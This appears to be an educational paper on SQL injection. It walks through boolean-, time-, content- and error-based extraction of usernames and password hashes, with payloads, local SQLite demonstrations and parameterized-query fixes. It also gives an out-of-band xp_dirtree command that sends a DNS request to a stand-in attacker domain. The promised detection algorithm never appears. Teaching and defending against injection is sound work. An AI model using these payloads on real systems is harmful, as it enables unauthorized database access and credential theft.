SQL Injection Attack and Detection using Hybrid Algorithm

1. Introduction
SQL injection appears in OWASP's Top Ten list of web application security risks. It is one of the most common strategies attackers use to steal identities and other sensitive information from websites, and it ranks among the highest-priority web security problems. We classify SQL injection attacks into three main types: 1) attacks based on errors and warnings, 2) blind SQL injection, and 3) modification of queries. All three can be carried out with automation tools (such as sqlmap), manually, or with custom programs written by attackers. In the first type, attackers learn about the database from the errors and warnings displayed when they supply attack patterns and unsafe queries. Once they know the database name, version, and other basic information, they can modify legitimate queries to discover table information and use it for harmful purposes. A website that does not display errors and warnings in response to SQL control statements and special characters is not necessarily secure. In that case, attackers can use blind SQL injection: they ask the database true-or-false questions and, from the responses, conclude whether the web page is vulnerable. Many tools and methodologies already exist to check whether a web page is vulnerable and to exploit any vulnerabilities found. Many tools and algorithms have also been proposed to detect SQL injection vulnerabilities and attack patterns, and many approaches have been suggested to improve existing web code.
SQL injection attacks (SQLIAs) are among the most widespread attacks on websites, followed by cross-site scripting (XSS) attacks. Where website fields lack proper input validation, an attacker could obtain direct access to the database of the underlying application. Many have offered defensive coding as a solution for preventing SQLIAs. However, although developers put controls in their source code, attackers continue to find new ways to bypass them. We propose a hybrid algorithm to attack vulnerable websites and then provide a detection and prevention algorithm.

1.1 Motivation
Despite the many security measures taken to protect systems, they remain vulnerable and can be compromised remotely. Attackers take advantage of loopholes and flaws, that is, they exploit the vulnerabilities of attack-prone systems. It is therefore critically important to eliminate the weak links in a system and make it more secure. This can be achieved by following secure coding guidelines, assessing the system for vulnerabilities, and understanding the techniques a black hat hacker uses to get into a system. Learning and implementing different hacking techniques helps in anticipating, finding, and fixing security flaws before they cause severe damage. SQL injection is one of the most serious web security threats at present, so it is important to know about vulnerable web pages and flaws in developer code. Through web page penetration testing, we learn about the loopholes in a system, which can then be rectified. Hence, the main motive behind this research is to learn the methods used to attack a web page, however secure it is, to find the vulnerabilities that make it attack prone, and finally to eliminate them by adopting secure coding techniques and practices. The goal is not only to know the existing methods but also to devise new methods, algorithms, and approaches that yield more effective and efficient solutions and make our systems more resistant to attack.

2. Related Work
Several researchers have taken up the challenge of developing automation scripts that find vulnerable web pages and their vulnerabilities, showing the extent to which attackers can find ways to break into supposedly secure systems. Much research has been conducted in this domain to make the internet and related applications more secure. Some researchers have suggested encrypting user names, passwords, and other details; others have suggested encoding user details as ASCII characters. Some have proposed static methods, some dynamic methods, and some a combination of the two. Many tools have also been developed to exploit the vulnerabilities of web pages. One researcher proposed a model that uses data mining to mine database logs and form user profiles that model normal behaviour and identify anomalous database transactions, so the system can identify behaviour that differs from normal. Bandhakavi proposed a misuse detection technique that detects SQLIAs by dynamically discovering the intent of a query and then comparing the structure of the identified query with that of a normal query. Another technique used for the same purpose is static anomaly detection using the Aho-Corasick pattern matching algorithm.

The algorithms and models proposed and implemented so far have some disadvantages: some consume a lot of memory, some are slow and inefficient, some are not user friendly, and others do not consider all perspectives when proposing a solution. In this research project we try to address these disadvantages with a new hybrid algorithm that takes into account most of the effective solutions and models proposed so far.

3. SQL Injection
SQL injection is a subset of the unverified or unsanitized user input vulnerability. The idea is to convince the application to run unsafe SQL queries so that database information is leaked. Consider a login page with traditional username and password fields: when unsafe user input is provided, it can cause database errors and warnings to be displayed, which are then used to attack the website. SQL injection poisons dynamic SQL statements, either commenting out certain parts of the statement or appending a condition that is always true. It takes advantage of design flaws in poorly designed web applications to turn SQL statements into malicious SQL code. The attack works on dynamic SQL statements. A dynamic statement is one that is generated at run time using parameters passed from a web form or URI query string. The attacker injects arbitrary data, most often a database query, into a string that is eventually executed by the database through a web application (e.g. a login form). Through SQL injection, an attacker can obtain unauthorized access to the database and can create, read, update, alter, or delete data stored in the back-end database. Applications built on almost any SQL database, such as Oracle, MySQL, PostgreSQL, MS SQL Server, or MS Access, are potentially vulnerable to SQL injection attacks. In its most common form, a SQL injection attack gives access to sensitive information such as social security numbers, credit card numbers, or other financial data.
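
The difference between a dynamic statement built by string concatenation and a parameterized statement can be illustrated with a minimal sketch. It uses Python's standard sqlite3 module and an in-memory database. The table name, the sample accounts, and the function names login_dynamic and login_parameterized are assumptions made for illustration and do not come from the algorithm proposed in this paper.

```python
import sqlite3


def make_db():
    # Hypothetical in-memory database with two sample accounts.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_dynamic(conn, username, password):
    # Vulnerable: user input is pasted into the SQL text at run time,
    # so quotes in the input change the structure of the statement.
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    # Safer: the statement text is fixed and input is bound as data.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


conn = make_db()
payload = "' OR '1'='1"  # appends a condition that is always true
print(login_dynamic(conn, "alice", payload))        # True: check bypassed
print(login_parameterized(conn, "alice", payload))  # False: treated as a literal
```

With the concatenated query, the payload closes the password literal and appends an always-true condition, so the check succeeds without a valid password. With bound parameters, the same payload is compared as an ordinary string and the login fails.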

Why SQL injection?
-Identify injectable parameters
-Identify the database type and version
-Discover the database schema
-Extract data
-Insert, modify, or delete data
-Deny service to authorized users by locking or deleting tables
-Bypass authentication
-Escalate privileges
-Execute remote commands by calling stored functions within the DBMS that are reserved for administrators
-Spoof identity, tamper with existing data, and cause repudiation issues such as voiding transactions or changing balances
-Obtain complete disclosure of all data on the system

SQL Injection Method:
The following methods are used to inject SQL into vulnerable systems:
-Injection through user input
-Injection through server variables
-Injection through cookie fields that contain attack strings
-Second-order injection, where hidden statements are stored to be executed at another time by another function

4. SQL Injection Classification
4.1. Boolean-Based SQL Injection: This technique requires an attacker to send a series of Boolean queries to the database server and analyze the results in order to infer the value of any given field. To find out the value of a username field that is vulnerable to blind injection, we need a few important functions:
ASCII(character)
SUBSTRING(string, start, length)
LENGTH(string)
Using these functions, we can begin testing for the value of the first character, and once we find it, we can move on to the next one, and so on, until the entire username is discovered.
SELECT * FROM Users WHERE UserID = '1' AND ASCII(SUBSTRING(username,1,1)) = 97 AND '1' = '1'

Here, SUBSTRING() takes the first character of the username string and limits the length to 1, so we can go through the characters one at a time. Next, the ASCII() function runs with that character as its parameter. The rest of the statement is a conditional that reads: if the ASCII value of this character equals 97 (which is "a"), and '1' = '1' is true (which it always is), then the whole statement is true and we have the right character. If it returns false, we increment the ASCII value from 97 to 98 and repeat the process until it returns true. To be certain that our tests are really returning true, we need a way to differentiate between true and false responses. This can be accomplished with the following query, which always returns false:
SELECT * FROM Users WHERE UserID = '1' AND '1' = '2'
Now we can use this as the baseline for false responses and compare it with our Boolean injections. If the server's response differs from this baseline, we can be reasonably confident we have obtained a true value. The final step when testing for Boolean-based injection is determining when to stop, that is, knowing the length of the string. Once we reach a null value (ASCII code 0), either we are done and have discovered the entire string, or the string itself contains a null value. We can figure this out with the LENGTH() function. If the username we were trying to obtain were "jsmith", the query could look like this:
SELECT * FROM Users WHERE UserID = '1' AND LENGTH(username) = 6 AND '1' = '1'
If this returns true, then we have successfully identified the username. If it returns false, then the string contains a null value and we need to continue the procedure until another null character is discovered.
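
The inference procedure described above can be reproduced against a local test database. The following is a minimal sketch, assuming an in-memory SQLite database in place of a real server. SQLite spells the functions unicode(), substr(), and length() rather than ASCII(), SUBSTRING(), and LENGTH(). The helper names page_has_rows and infer_username are hypothetical, and page_has_rows stands in for a vulnerable page that reveals only whether the query matched any row.

```python
import sqlite3


def make_db():
    # Local stand-in for the Users table used in the queries above.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID TEXT, username TEXT)")
    conn.execute("INSERT INTO Users VALUES ('1', 'jsmith')")
    return conn


def page_has_rows(conn, condition):
    # Simulates the vulnerable page: the condition is concatenated into
    # the statement and only a true/false signal is exposed.
    query = (
        "SELECT * FROM Users WHERE UserID = '1' AND "
        + condition + " AND '1' = '1'"
    )
    return len(conn.execute(query).fetchall()) > 0


def infer_username(conn, max_len=32):
    # Baseline: a condition that is always false must give a false response.
    if page_has_rows(conn, "'1' = '2'"):
        raise RuntimeError("cannot tell true from false responses")
    # Determine when to stop by testing candidate lengths.
    length = next(
        n for n in range(1, max_len + 1)
        if page_has_rows(conn, f"length(username) = {n}")
    )
    chars = []
    for pos in range(1, length + 1):
        # Increment the candidate code until the response turns true.
        for code in range(32, 127):
            if page_has_rows(conn, f"unicode(substr(username, {pos}, 1)) = {code}"):
                chars.append(chr(code))
                break
    return "".join(chars)


print(infer_username(make_db()))  # prints jsmith
```

The sketch tests the length first, which avoids relying on a null character as the stop signal. Each character costs up to 95 queries in this linear scan; that request pattern is one of the signals a detection mechanism can look for.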

4.2. Time-Based SQL Injection: Time-based SQL injection involves sending requests to the database and analyzing server response times in order to deduce information. It takes advantage of the sleep and time delay functions available in database systems. As before, we can use the ASCII() and SUBSTRING() functions to enumerate a field, together with a new function called SLEEP(). Let's examine the following MySQL query sent to the server:
SELECT * FROM Users WHERE UserID = 1 AND IF(ASCII(SUBSTRING(username,1,1)) = 97, SLEEP(10), 'false')
The IF() function takes three parameters: the condition, the value returned if the condition is true, and the value returned if the condition is false. In this example, the condition is the same test that we used for Boolean-based injection. The whole expression reads: if the first character in the username string is "a", then sleep for ten seconds, otherwise return false. We can then increment the ASCII value until we receive a delayed response from the database, thus determining the correct characters in the username. It is important to choose a delay that is long enough to be distinguished from normal variation in server response times.
MySQL also has a function called BENCHMARK() that can be used in time-based injection attacks. It takes the number of times to execute an expression as its first parameter and the expression itself as the second parameter. For example:
SELECT * FROM Users WHERE UserID = 1 AND IF(ASCII(SUBSTRING(username,1,1)) = 97, BENCHMARK(10000000, CURTIME()), 'false')
This states that if the first character of the username is "a" (97), then CURTIME() is run ten million times. CURTIME() returns the current time, but the function passed here does not really matter. It is important, however, to make sure the function runs enough times to have a measurable impact on the response time.
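
The requirement that the delay be distinguishable from normal response times can be made concrete with a small calculation. The sketch below is a rough heuristic, not a method taken from this paper: it assumes a list of baseline response times measured without any injected delay, places the decision threshold halfway between the typical baseline and the baseline plus the injected delay, and treats a delay as usable only if it exceeds twice the observed spread. The function names and the sample timings are hypothetical.

```python
import statistics


def delay_threshold(baseline_times, injected_delay):
    # Midpoint between a typical normal response and a delayed one.
    typical = statistics.median(baseline_times)
    return typical + injected_delay / 2


def is_delayed(observed, baseline_times, injected_delay):
    # True if the observed response time suggests the delay was triggered.
    return observed >= delay_threshold(baseline_times, injected_delay)


def delay_is_distinguishable(baseline_times, injected_delay):
    # Assumed rule of thumb: the delay should be larger than twice the
    # spread of normal response times, otherwise jitter can mimic it.
    spread = max(baseline_times) - min(baseline_times)
    return injected_delay > 2 * spread


# Hypothetical response times in seconds, measured without injection.
baseline = [0.12, 0.15, 0.11, 0.30, 0.14]

print(delay_is_distinguishable(baseline, 10))   # True
print(delay_is_distinguishable(baseline, 0.2))  # False
print(is_delayed(10.2, baseline, 10))           # True
print(is_delayed(0.30, baseline, 10))           # False
```

The same comparison is useful on the defensive side: responses that repeatedly exceed the normal range by a fixed amount for one client are a possible indicator of time-based probing.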

4.3. Out-of-Band SQL Injection: The third main category of SQL injection is out-of-band. These attacks work by retrieving information through alternative channels, such as emails, file systems, HTTP requests, or DNS resolutions. Out-of-band SQL injection is useful once all in-band and blind injection methods have been exhausted. Example:
http://exampleurl.com/product.php?id=1

And the resulting SQL Query looks like:
SELECT * FROM Products WHERE ProductID = 1;
Here is what the malicious request would look like in MS SQL:
SELECT * FROM Products WHERE ProductID = 1; EXEC master..xp_dirtree '\\attacker.test.com\' --
The xp_dirtree stored procedure can be used to list directory contents, and in this example, attacker.test.com is a domain owned by the attacker. Using a stacked query, xp_dirtree executes, and a DNS lookup to attacker.test.com occurs. If the system is vulnerable, the attacker can check the DNS logs and view the request.

4.4. Blind SQL Injections: In a well-built production application you generally cannot see error responses on the page, so you cannot extract data through UNION attacks or error-based attacks. You have to use blind SQL injection attacks to extract data. There are two kinds of blind SQL injection.
A blind SQL injection vulnerability looks like the following:
global $wpdb; $title = $wpdb->get_var("select post_title from " . $wpdb->posts . " where ID=" . $_GET['id']);
In the above example, raw unsanitized user input is sent directly to the database by concatenating the $_GET['id'] variable directly to the SQL query. To fix this vulnerability, you would use the prepare() method to sanitize and escape any database input.
The difference from a regular SQLi vulnerability is that the query output is never sent to the browser. A blind SQLi vulnerability is just as serious as a regular one, because an attacker can in some cases easily insert or update data in your database. It is, however, more difficult to extract data from the database, because the attacker cannot see the query output.
Time based blind SQL attacks
There are generally two ways an attacker extracts data from a database using a blind SQL injection attack. The first is a time based attack. Let's assume that, using the above SQLi vulnerability, an attacker can send any command to the database but cannot see the output. They can only see the resulting web page.
An attacker might ask the database a question like "Does the username of the first admin account start with 'a'? If it does, then sleep for 5 seconds, and if it does not, don't sleep at all." If the web page takes less than 5 seconds to be generated and returned to the web browser, the attacker knows that the admin account name does not start with the letter 'a', moves on to the next letter, 'b', and asks the same question.
Using this technique, an attacker can launch a time based attack on a website, determine the names of admin accounts, and extract hashed user passwords.
Content based blind SQL injection attacks
A content based blind SQL injection attack is another way for an attacker to extract data from a database when they can’t see the database output.
Suppose the query generating the content is the following (remember, the query output is not sent to the user):
select post_status from wp_posts where ID=1
Let's assume that the value '1' above is an unfiltered query parameter appended to the database query, as in the example above. An attacker can therefore control all text after 'ID='. To see what content is generated when the condition is false, the attacker can append the following to the query:
select post_status from wp_posts where ID=1 and 1=2
1 is obviously not equal to 2, so the database returns an empty result set. The attacker examines the resulting page, and if it is a page with no content or an error message saying something like 'no content', they know what a response from a query with a false condition looks like. The attacker can then include something like the following:
select post_status from wp_posts where ID=1 and (select ID from wp_users where user_login='admin' and ID=1)
The above query returns an empty result if the user with ID 1 does not have the username 'admin'. If the user with ID 1 does have the username 'admin', the result is non-empty and the page shows its normal content. Using this technique, an attacker can extract data from a database by checking for empty and non-empty responses from the application.
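
The empty versus non-empty distinction can be checked by running the queries above against a local test database. This is a minimal sketch, assuming an in-memory SQLite database with cut-down wp_posts and wp_users tables. The render_page function is a hypothetical stand-in for the vulnerable page: it never returns the query output, only different content depending on whether any row matched.

```python
import sqlite3


def make_db():
    # Cut-down versions of the two tables referenced in the queries above.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER, post_status TEXT)")
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT)")
    conn.execute("INSERT INTO wp_posts VALUES (1, 'publish')")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin')")
    return conn


def render_page(conn, id_param):
    # Vulnerable on purpose: the parameter is appended to the query text.
    rows = conn.execute(
        "select post_status from wp_posts where ID=" + id_param
    ).fetchall()
    # The query output itself is never shown to the visitor.
    return "post found" if rows else "no content"


conn = make_db()
print(render_page(conn, "1"))            # post found
print(render_page(conn, "1 and 1=2"))    # no content (false baseline)
print(render_page(
    conn,
    "1 and (select ID from wp_users where user_login='admin' and ID=1)",
))                                       # post found (condition is true)
print(render_page(
    conn,
    "1 and (select ID from wp_users where user_login='root' and ID=1)",
))                                       # no content (condition is false)
```

Although the page never prints database values, its two possible responses act as a one-bit channel, which is why suppressing output alone does not remove the vulnerability.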
Another example of a content based blind SQL injection query is:

select post_status from wp_posts where ID=1 and (select 1 from wp_users where substring(user_pass,1,1) = 'a' and ID=1)
The above query checks whether the first letter of the hashed password for the user with ID 1 is 'a'. Using this technique, an attacker can go through every character and extract the hashed passwords of admin accounts.

4.5. Error Based SQL Injection: In this method, attackers read details such as table names and content from database errors displayed on production servers. The best defense here is to avoid displaying database error messages, which prevents attackers from obtaining that information through error output.
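
The recommendation in Section 4.5 to avoid displaying database error messages can be sketched as follows. The example assumes Python's standard sqlite3 and logging modules. The function name fetch_post_title, the logger name, and the message text are hypothetical. Database exceptions are recorded in a server-side log and the visitor receives only a generic message. The query also binds its parameter, because hiding errors does not by itself make a page safe from blind injection.

```python
import logging
import sqlite3

logger = logging.getLogger("app.db")  # hypothetical logger name

GENERIC_ERROR = "An internal error occurred."


def fetch_post_title(conn, post_id):
    try:
        row = conn.execute(
            "SELECT post_title FROM wp_posts WHERE ID = ?", (post_id,)
        ).fetchone()
    except sqlite3.Error:
        # Full details (statement, table names, driver message) go to the
        # server log only; nothing database-specific reaches the page.
        logger.exception("database query failed")
        return GENERIC_ERROR
    return row[0] if row else "Not found."


# Usage: a database without the expected table triggers the generic path.
broken = sqlite3.connect(":memory:")
print(fetch_post_title(broken, "1"))  # An internal error occurred.

working = sqlite3.connect(":memory:")
working.execute("CREATE TABLE wp_posts (ID INTEGER, post_title TEXT)")
working.execute("INSERT INTO wp_posts VALUES (1, 'Hello')")
print(fetch_post_title(working, 1))   # Hello
```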